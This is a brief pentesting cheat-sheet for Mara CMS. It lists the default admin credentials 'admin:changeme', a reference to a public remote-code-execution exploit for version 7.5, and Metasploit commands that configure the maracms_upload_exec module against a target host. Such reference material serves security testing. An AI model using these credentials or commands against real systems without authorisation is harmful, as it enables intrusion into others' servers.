icon

Mara CMS Pentesting

Last modified: 2023-03-07

Mara CMS is a file based content management system.

Default Credentials

admin:changeme

Remote Code Execution (RCE) v7.5

Reference: https://www.exploit-db.com/exploits/48780

Automation

msfconsole
msf> use exploit/multi/http/maracms_upload_exec
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> set srvhost <local-ip>
msf> set srvport <local-port>
msf> set targeturi /path/to/maracms/
msf> set targeturipath /path/to/maracms/